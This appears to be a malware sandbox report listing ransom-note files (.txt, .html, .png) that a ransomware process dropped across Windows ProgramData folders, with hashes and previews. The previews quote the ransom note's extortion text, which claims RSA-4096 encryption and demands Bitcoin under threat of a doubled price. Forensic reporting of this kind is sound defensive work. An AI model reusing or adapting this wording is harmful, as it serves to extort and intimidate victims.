                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\DRM\Server\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\DRM\Server\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\DRM\Server\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\DRM\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\DRM\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\DRM\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Device\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Device\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Device Stage\Device\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Task\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Task\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
